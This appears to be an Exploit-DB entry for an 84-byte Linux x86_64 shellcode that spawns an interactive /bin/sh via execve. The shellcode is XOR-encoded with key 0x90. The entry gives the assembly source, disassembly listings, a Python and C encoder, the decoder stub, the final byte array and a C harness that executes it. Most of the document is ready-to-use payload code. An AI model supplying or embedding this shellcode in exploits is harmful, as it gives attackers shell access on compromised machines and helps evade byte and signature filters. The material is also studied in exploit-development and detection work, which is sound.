Linux/x64 - execve() + XOR Encoded Shellcode (84 bytes)

EDB-ID:

39869

CVE:

N/A




Platform:

Linux_x86-64

Date:

2016-05-30


/* 
	# Title : Linux x86_64 XOR encode execve("/bin//sh",{"//bin/sh","-i",NULL},NULL) shellcode
	# Date : 31-05-2016
	# Author : Roziul Hasan Khan Shifat
	# Tested On : Ubuntu 14.04 LTS x86_64
*/


/* 								
				main code 
			------------------------
												
section .text
	global _start
_start:

xor rax,rax
xor rdx,rdx

push rax
push rax

mov [rsp],dword '//bi'
mov [rsp+4],dword 'n/sh'


mov rdi,rsp


push rax
push rax

mov [rsp],word '-i'
mov rsi,rsp

push rdx
push rsi
push rdi

mov rsi,rsp

add rax,59
syscall


					Disassembly
				     ------------------
Disassembly of section .text:

0000000000400080 <_start>:
  400080:	48 31 c0             	xor    %rax,%rax
  400083:	48 31 d2             	xor    %rdx,%rdx
  400086:	50                   	push   %rax
  400087:	50                   	push   %rax
  400088:	c7 04 24 2f 2f 62 69 	movl   $0x69622f2f,(%rsp)
  40008f:	c7 44 24 04 6e 2f 73 	movl   $0x68732f6e,0x4(%rsp)
  400096:	68 
  400097:	48 89 e7             	mov    %rsp,%rdi
  40009a:	50                   	push   %rax
  40009b:	50                   	push   %rax
  40009c:	66 c7 04 24 2d 69    	movw   $0x692d,(%rsp)
  4000a2:	48 89 e6             	mov    %rsp,%rsi
  4000a5:	52                   	push   %rdx
  4000a6:	56                   	push   %rsi
  4000a7:	57                   	push   %rdi
  4000a8:	48 89 e6             	mov    %rsp,%rsi
  4000ab:	48 83 c0 3b          	add    $0x3b,%rax
  4000af:	0f 05                	syscall
  
*/


/*

					encoder
				   --------------
I used a python script and a C program to encode shellcode


						python script
					   ---------------------	
a="\x48\x31\xc0\x48\x31\xd2\x50\x50\xc7\x04\x24\x2f\x2f\x62\x69\xc7\x44\x24\x04\x6e\x2f\x73\x68\x48\x89\xe7\x50\x50\x66\xc7\x04\x24\x2d\x69\x48\x89\xe6\x52\x56\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"
print "shellcode length %d"%len(a)
a=a[::-1]

for i in range(len(a)-1):
	print a[i].encode('hex')


						C program
	       				    -----------------
														
#include<stdio.h>
#include<string.h>
main(int i,char *a[])
{
if(i!=2)
{
printf("Usage %s <filename>\n",a[0]);
return 0;
}



FILE *f,*o;
f=fopen(a[1],"r");
int shell;

o=fopen("shellencode.txt","w");
if(!f || !o )
{
perror("FILE I/O error: ");
return 0;
}

while( (fscanf(f,"%x",&shell)) !=EOF )
{
printf("%.2x\n",shell);
fprintf(o,"%#.2x,",shell^0x90); //0x90 is seed key
fflush(o);
}


fclose(o);
fclose(f);
return 0;
}
														
---------------------------------------------------------------------------------------------------------------------------------
I am sorry that my Python script is very poor. Search the internet for a better XOR encoder Python script.
My Python script reverses the shellcode.
Then copy and paste the reversed shellcode into a file.
Then I use the C program to encode the reversed shellcode and write it to shellencode.txt.
----------------------------------------------------------------------------------------------------------------------------- 														

*/


/*
					decoder
				    ---------------
section .text
	global _start
_start:

jmp shellcode


decoder:
pop rsi
xor rcx,rcx
mov cl,49

cdq

mov dl,0x90 ;seed key

decode:
xor rax,rax
mov al,[rsi]
xor al,dl
dec rsp
mov [rsp],byte al
inc rsi
loop decode

call rsp


shellcode:
call decoder
 db 0x95,0x9f,0xab,0x50,0x13,0xd8,0x76,0x19,0xd8,0xc7,0xc6,0xc2,0x76,0x19,0xd8,0xf9,0xbd,0xb4,0x94,0x57,0xf6,0xc0,0xc0,0x77,0x19,0xd8,0xf8,0xe3,0xbf,0xfe,0x94,0xb4,0xd4,0x57,0xf9,0xf2,0xbf,0xbf,0xb4,0x94,0x57,0xc0,0xc0,0x42,0xa1,0xd8,0x50,0xa1


					Disassembly
				   -------------------

Disassembly of section .text:

0000000000400080 <_start>:
  400080:	eb 1d                	jmp    40009f <shellcode>

0000000000400082 <decoder>:
  400082:	5e                   	pop    %rsi
  400083:	48 31 c9             	xor    %rcx,%rcx
  400086:	b1 31                	mov    $0x31,%cl
  400088:	99                   	cltd   
  400089:	b2 90                	mov    $0x90,%dl

000000000040008b <decode>:
  40008b:	48 31 c0             	xor    %rax,%rax
  40008e:	8a 06                	mov    (%rsi),%al
  400090:	30 d0                	xor    %dl,%al
  400092:	48 ff cc             	dec    %rsp
  400095:	88 04 24             	mov    %al,(%rsp)
  400098:	48 ff c6             	inc    %rsi
  40009b:	e2 ee                	loop   40008b <decode>
  40009d:	ff d4                	callq  *%rsp

000000000040009f <shellcode>:
  40009f:	e8 de ff ff ff       	callq  400082 <decoder>
  4000a4:	95                   	xchg   %eax,%ebp
  4000a5:	9f                   	lahf   
  4000a6:	ab                   	stos   %eax,%es:(%rdi)
  4000a7:	50                   	push   %rax
  4000a8:	13 d8                	adc    %eax,%ebx
  4000aa:	76 19                	jbe    4000c5 <shellcode+0x26>
  4000ac:	d8 c7                	fadd   %st(7),%st
  4000ae:	c6 c2 76             	mov    $0x76,%dl
  4000b1:	19 d8                	sbb    %ebx,%eax
  4000b3:	f9                   	stc    
  4000b4:	bd b4 94 57 f6       	mov    $0xf65794b4,%ebp
  4000b9:	c0 c0 77             	rol    $0x77,%al
  4000bc:	19 d8                	sbb    %ebx,%eax
  4000be:	f8                   	clc    
  4000bf:	e3 bf                	jrcxz  400080 <_start>
  4000c1:	fe                   	(bad)  
  4000c2:	94                   	xchg   %eax,%esp
  4000c3:	b4 d4                	mov    $0xd4,%ah
  4000c5:	57                   	push   %rdi
  4000c6:	f9                   	stc    
  4000c7:	f2 bf bf b4 94 57    	repnz mov $0x5794b4bf,%edi
  4000cd:	c0 c0 42             	rol    $0x42,%al
  4000d0:	a1                   	.byte 0xa1
  4000d1:	d8 50 a1             	fcoms  -0x5f(%rax)

*/

/*
The shellcode array below is the assembled decoder.asm, i.e. the encoded shellcode.
*/  


/* Byte array of the assembled decoder.asm listing above (84 bytes):
 * the first 36 bytes (0x400080-0x4000a3 in the disassembly) are the
 * jmp/call/pop decoder stub with cl = 49 and the key 0x90 in dl; the
 * remaining 48 bytes are the 'db' data, i.e. the execve stub reversed
 * and XOR-ed with 0x90. The key and the stub are constant, so the
 * encoding offers no protection from analysis: XOR-ing the data bytes
 * with 0x90 recovers the original listing. */
char shellcode[]="\xeb\x1d\x5e\x48\x31\xc9\xb1\x31\x99\xb2\x90\x48\x31\xc0\x8a\x06\x30\xd0\x48\xff\xcc\x88\x04\x24\x48\xff\xc6\xe2\xee\xff\xd4\xe8\xde\xff\xff\xff\x95\x9f\xab\x50\x13\xd8\x76\x19\xd8\xc7\xc6\xc2\x76\x19\xd8\xf9\xbd\xb4\x94\x57\xf6\xc0\xc0\x77\x19\xd8\xf8\xe3\xbf\xfe\x94\xb4\xd4\x57\xf9\xf2\xbf\xbf\xb4\x94\x57\xc0\xc0\x42\xa1\xd8\x50\xa1";


/* Test harness: casts the writable data array to a function pointer and
 * calls it. Casting a data object to a function pointer is undefined
 * behaviour in C, and under the default NX/W^X mapping of the data
 * segment the indirect call simply faults; that is the mitigation this
 * pattern runs into, and a data array invoked as a function is itself an
 * easily recognised pattern in static review. The arguments i and a are
 * unused. */
int main(int i,char *a[])
{
(* (int(*)()) shellcode)();

}